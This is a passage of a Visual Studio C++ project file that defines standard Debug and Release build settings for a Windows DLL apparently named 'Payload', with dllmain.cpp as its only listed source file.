 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;_DEBUG;PAYLOAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |       <PrecompiledHeaderFile />
 94 |     </ClCompile>
 95 |     <Link>
 96 |       <SubSystem>Windows</SubSystem>
 97 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 98 |     </Link>
 99 |   </ItemDefinitionGroup>
100 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
101 |     <ClCompile>
102 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <Optimization>Disabled</Optimization>
105 |       <SDLCheck>true</SDLCheck>
106 |       <PreprocessorDefinitions>_DEBUG;PAYLOAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
107 |       <ConformanceMode>true</ConformanceMode>
108 |     </ClCompile>
109 |     <Link>
110 |       <SubSystem>Windows</SubSystem>
111 |       <GenerateDebugInformation>true</GenerateDebugInformation>
112 |     </Link>
113 |   </ItemDefinitionGroup>
114 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
115 |     <ClCompile>
116 |       <PrecompiledHeader>Use</PrecompiledHeader>
117 |       <WarningLevel>Level3</WarningLevel>
118 |       <Optimization>MaxSpeed</Optimization>
119 |       <FunctionLevelLinking>true</FunctionLevelLinking>
120 |       <IntrinsicFunctions>true</IntrinsicFunctions>
121 |       <SDLCheck>true</SDLCheck>
122 |       <PreprocessorDefinitions>WIN32;NDEBUG;PAYLOAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
123 |       <ConformanceMode>true</ConformanceMode>
124 |     </ClCompile>
125 |     <Link>
126 |       <SubSystem>Windows</SubSystem>
127 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
128 |       <OptimizeReferences>true</OptimizeReferences>
129 |       <GenerateDebugInformation>true</GenerateDebugInformation>
130 |     </Link>
131 |   </ItemDefinitionGroup>
132 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
133 |     <ClCompile>
134 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
135 |       <WarningLevel>Level3</WarningLevel>
136 |       <Optimization>MaxSpeed</Optimization>
137 |       <FunctionLevelLinking>true</FunctionLevelLinking>
138 |       <IntrinsicFunctions>true</IntrinsicFunctions>
139 |       <SDLCheck>true</SDLCheck>
140 |       <PreprocessorDefinitions>NDEBUG;PAYLOAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
141 |       <ConformanceMode>true</ConformanceMode>
142 |     </ClCompile>
143 |     <Link>
144 |       <SubSystem>Windows</SubSystem>
145 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
146 |       <OptimizeReferences>true</OptimizeReferences>
147 |       <GenerateDebugInformation>true</GenerateDebugInformation>
148 |     </Link>
149 |   </ItemDefinitionGroup>
150 |   <ItemGroup>
151 |     <ClInclude Include="stdafx.h" />
152 |     <ClInclude Include="targetver.h" />
153 |   </ItemGroup>
154 |   <ItemGroup>
155 |     <ClCompile Include="dllmain.cpp" />
156 |   </ItemGroup>
157 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
158 |   <ImportGroup Label="ExtensionTargets">
159 |   </ImportGroup>
160 | </Project>


--------------------------------------------------------------------------------